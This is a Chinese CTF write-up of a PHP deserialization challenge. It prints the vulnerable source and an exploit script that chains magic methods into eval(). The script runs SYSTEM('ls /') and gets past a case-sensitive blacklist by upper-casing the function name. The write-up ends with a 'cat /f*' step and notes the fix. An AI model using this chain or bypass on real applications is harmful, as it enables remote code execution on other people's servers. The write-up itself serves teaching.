原题如下
<?php
include "waf.php";
/**
 * Challenge class whose __invoke() hands a property to eval().
 *
 * Both properties are public, so serialized input fully controls them.
 * NOTE(review): eval() on a value that arrives through unserialize() is the
 * code-execution sink of this file. The only check in front of it is
 * checkcheck() from waf.php, which is not shown in this listing.
 */
class NISA{
// The default is exactly the string __wakeup() compares against.
public $fun="show_me_flag";
// String passed to checkcheck() and then to eval() in __invoke().
public $txw4ever;
/**
 * Runs automatically when an instance is unserialized; calls hint() when
 * $fun loosely equals "show_me_flag".
 */
public function __wakeup()
{
// Loose comparison (==), not strict (===).
if($this->fun=="show_me_flag"){
// hint() is defined outside this listing; the commented sketch at the end
// of the file shows it echoing text and then calling die().
hint();
}
}
/**
 * Hook for calls to undefined or inaccessible methods: stores the first
 * call argument in $fun. $from is the method name, $val the argument list.
 */
function __call($from,$val){
$this->fun=$val[0];
}
/**
 * String-conversion hook: echoes $fun as a side effect and returns a
 * single space.
 */
public function __toString()
{
echo $this->fun;
return " ";
}
/**
 * Runs when the object is called like a function: passes $txw4ever to
 * checkcheck() and then evaluates it as PHP code.
 */
public function __invoke()
{
// Per the commented sketch at the end of the file, checkcheck() is a
// preg_match() blacklist that die()s on a match; its pattern is not shown.
checkcheck($this->txw4ever);
// '@' silences diagnostics raised by the eval() expression.
@eval($this->txw4ever);
}
}
/**
 * On unserialize, calls nisa() on $ext with $x as the argument.
 *
 * Both properties are public and come straight from the serialized data.
 * No class in this listing defines a nisa() method, so when $ext is an
 * object whose class has __call(), the call is routed to that hook.
 */
class TianXiWei{
public $ext;
public $x;
public function __wakeup()
{
// No type check on $ext: any unserialized object can sit here.
$this->ext->nisa($this->x);
}
}
/**
 * Holds two caller-controlled objects and forwards work to them from its
 * magic methods.
 */
class Ilovetxw{
public $huang;
public $su;
/**
 * Undefined-method hook: writes the first call argument to $huang->fun.
 */
public function __call($fun1,$arg){
// If `fun` is not accessible on $huang (it is private in class four),
// this write triggers $huang's __set() instead of a direct assignment.
$this->huang->fun=$arg[0];
}
/**
 * String-conversion hook: calls $su as a function and returns its result.
 */
public function __toString(){
$bb = $this->su;
// When $su is an object this triggers its __invoke(). NISA::__invoke()
// returns nothing, so the conversion itself fails afterwards, but only
// once __invoke() has already run.
return $bb();
}
}
/**
 * Class with a private $fun and a __set() hook that runs for writes to
 * inaccessible properties.
 */
class four{
public $a="TXW4EVER";
// private: a write to ->fun from outside the class goes through __set().
private $fun='abc';
/**
 * Assigns the named property, then lower-cases $a and discards the result.
 */
public function __set($name, $value)
{
// Variable property name: sets whichever property the caller named.
$this->$name=$value;
// NOTE(review): single '=' is an assignment, not a comparison. $fun is
// overwritten with "sixsixsix" and the branch is always taken.
if ($this->fun = "sixsixsix"){
// strtolower() needs a string; if $a holds an object, PHP converts it
// through that object's __toString().
strtolower($this->a);
}
}
}
// Entry point: with ?ser=... the raw query value is unserialized; without
// it the file prints its own source.
if(isset($_GET['ser'])){
// NOTE(review): unserialize() on request data lets the client choose which
// of the classes above are instantiated and with what property values, and
// their __wakeup() hooks run immediately. No allowed_classes restriction is
// passed and '@' hides any resulting warnings. Untrusted input should be
// parsed with json_decode(), or with
// unserialize($s, ['allowed_classes' => false]).
@unserialize($_GET['ser']);
}else{
highlight_file(__FILE__);
}
//func checkcheck($data){
// if(preg_match(......)){
// die(something wrong);
// }
//}
//function hint(){
// echo ".......";
// die();
//}
?>
先给出魔术方法
__destruct() // 对象销毁时自动执行
__wakeup() // 反序列化中自动执行
__toString() // 将对象转换为字符串时自动触发
__invoke() // 将对象作为函数调用时触发
__get($name) // 访问对象中不存在的属性时触发,并将名字作为参数传入
__set($name, $value)// 对对象中不存在的属性赋值时触发,并将名字和值作为参数传入
__call($name, $args)// 调用对象中不存在的方法时触发,并将名字和参数数组作为参数传入
// Runs automatically during unserialize(). With the class default
// $fun = "show_me_flag" the loose comparison is true and hint() is called.
public function __wakeup()
{
if ($this->fun == "show_me_flag") {
hint();
}
}
有Hint先看一下Hint
exp
<?php
include "waf.php";
/**
 * Local copy of the challenge class, used only to produce a serialized
 * string. $fun keeps its default, so an unserialized instance takes the
 * hint() branch of __wakeup().
 */
class NISA
{
// Default equals the string __wakeup() compares against.
public $fun = "show_me_flag";
// Left unset in this script; __invoke() would pass it to eval().
public $txw4ever;
/** Unserialize hook: calls hint() when $fun loosely equals "show_me_flag". */
public function __wakeup()
{
if ($this->fun == "show_me_flag") {
// Defined outside this listing; see the commented sketch at the end.
hint();
}
}
/** Undefined-method hook: stores the first call argument in $fun. */
function __call($from, $val)
{
$this->fun = $val[0];
}
/** String-conversion hook: echoes $fun and returns a single space. */
public function __toString()
{
echo $this->fun;
return " ";
}
/** Call hook: passes $txw4ever to checkcheck(), then to eval(). */
public function __invoke()
{
checkcheck($this->txw4ever);
// NOTE(review): eval() of a property that serialized input controls.
@eval($this->txw4ever);
}
}
/**
 * Unserialize hook calls nisa() on $ext with $x. No class in this listing
 * defines nisa(), so the call lands in $ext's __call() when it has one.
 */
class TianXiWei
{
public $ext;
public $x;
public function __wakeup()
{
$this->ext->nisa($this->x);
}
}
/**
 * Forwards to two caller-controlled objects from its magic methods.
 */
class Ilovetxw
{
public $huang;
public $su;
/** Undefined-method hook: writes the first call argument to $huang->fun. */
public function __call($fun1, $arg)
{
// Triggers $huang's __set() when `fun` is inaccessible on that object.
$this->huang->fun = $arg[0];
}
/** String-conversion hook: calls $su as a function, returns its result. */
public function __toString()
{
$bb = $this->su;
// Triggers __invoke() when $su is an object.
return $bb();
}
}
/**
 * Private $fun plus a __set() hook for writes to inaccessible properties.
 */
class four
{
public $a = "TXW4EVER";
// private: outside writes to ->fun are routed through __set().
private $fun = 'abc';
public function __set($name, $value)
{
// Sets whichever property the caller named.
$this->$name = $value;
// NOTE(review): '=' assigns rather than compares; branch always taken.
if ($this->fun = "sixsixsix") {
// An object in $a is converted through its __toString() here.
strtolower($this->a);
}
}
}
// Serializes a default NISA (fun = "show_me_flag") and URL-encodes it. When
// the target unserializes this string, NISA::__wakeup() takes the hint()
// branch.
$a=new NISA();
echo urlencode(serialize($a));
//if (isset($_GET['ser'])) {
// @unserialize($_GET['ser']);
//} else {
// highlight_file(__FILE__);
//}
//func checkcheck($data){
// if(preg_match(......)){
// die(something wrong);
// }
//}
//function hint(){
// echo ".......";
// die();
//}
?>
flag在根目录下
观察代码中的危险函数eval,所以这道题是从eval倒推上去
NISA::__invoke()=>Ilovetxw::__toString()=>four::__set()=>Ilovetxw::__call()=>TianXiWei::__wakeup()(这里是从eval倒推的顺序,实际触发顺序是从右到左;exp中ext是Ilovetxw对象,所以这一步触发的是Ilovetxw::__call(),不是NISA::__call())
exp
<?php
//include "waf.php";
// Turns off all PHP error reporting for this local script run. waf.php is
// not included here (see the commented include above).
error_reporting(0);
/**
 * Local copy of the challenge class. This copy declares $fun without a
 * default, so the serialized value is null, the comparison in __wakeup()
 * is false, and hint() (which the commented sketch shows calling die())
 * is not reached.
 */
class NISA
{
// No default here, unlike the challenge source.
public $fun;
// String that __invoke() passes to checkcheck() and then to eval().
public $txw4ever;
/** Unserialize hook: calls hint() when $fun loosely equals "show_me_flag". */
public function __wakeup()
{
if ($this->fun == "show_me_flag") {
hint();
}
}
/** Undefined-method hook: stores the first call argument in $fun. */
function __call($from, $val)
{
$this->fun = $val[0];
}
/** String-conversion hook: echoes $fun and returns a single space. */
public function __toString()
{
echo $this->fun;
return " ";
}
/** Call hook: the sink of the chain, checkcheck() followed by eval(). */
public function __invoke()
{
// Blacklist check from waf.php; its pattern is not shown on this page.
checkcheck($this->txw4ever);
// NOTE(review): eval() of a property that serialized input controls.
@eval($this->txw4ever);
}
}
/**
 * Entry point of the chain: __wakeup() runs on unserialize and calls the
 * undefined method nisa() on $ext, which reaches $ext's __call().
 */
class TianXiWei
{
public $ext;
public $x;
public function __wakeup()
{
$this->ext->nisa($this->x);
}
}
/**
 * Used twice in the object graph built below: once for its __call() (as
 * TianXiWei::$ext) and once for its __toString() (as four::$a).
 */
class Ilovetxw
{
public $huang;
public $su;
/** Undefined-method hook: writes the first call argument to $huang->fun. */
public function __call($fun1, $arg)
{
// `fun` is private in class four, so this write triggers four::__set().
$this->huang->fun = $arg[0];
}
/** String-conversion hook: calls $su as a function, returns its result. */
public function __toString()
{
$bb = $this->su;
// With a NISA object in $su this triggers NISA::__invoke().
return $bb();
}
}
/**
 * Middle link: a write to the private $fun from outside reaches __set(),
 * which string-converts whatever is stored in $a.
 */
class four
{
public $a = "TXW4EVER";
// private: outside writes to ->fun are routed through __set().
private $fun = 'abc';
public function __set($name, $value)
{
// Sets whichever property the caller named.
$this->$name = $value;
// NOTE(review): '=' assigns rather than compares; branch always taken.
if ($this->fun = "sixsixsix") {
// An object in $a is converted through its __toString() here.
strtolower($this->a);
}
}
}
// Builds the object graph for the chain described above the listing. Each
// assignment fills the property that the next magic method reads:
// TianXiWei::__wakeup() -> Ilovetxw::__call() -> four::__set()
// -> Ilovetxw::__toString() -> NISA::__invoke().
// Every link relies on public properties being restored from untrusted
// serialized data without any class or type restriction.
$a=new TianXiWei();
$a->ext=new Ilovetxw();
$a->ext->huang=new four();
$a->ext->huang->a=new Ilovetxw();
$a->ext->huang->a->su=new NISA();
// Upper-case spelling of the function name; PHP resolves function names
// case-insensitively.
$a->ext->huang->a->su->txw4ever="SYSTEM('ls /');";
// Bare property read with no effect; $fun stays null.
$a->ext->huang->a->su->fun;
echo urlencode(serialize($a));
//if (isset($_GET['ser'])) {
// @unserialize($_GET['ser']);
//} else {
// highlight_file(__FILE__);
//}
//func checkcheck($data){
// if(preg_match(......)){
// die(something wrong);
// }
//}
//function hint(){
// echo ".......";
// die();
//}
?>
这里被waf.php里的函数拦截了,fuzz一波
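将system改成大写即可通过:PHP的函数名不区分大小写,而checkcheck()里的正则看来是区分大小写的(推测没有加i修饰符)。这种黑名单过滤挡不住反序列化之后的eval执行,根本的修复是不对用户输入做unserialize。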
cat /f*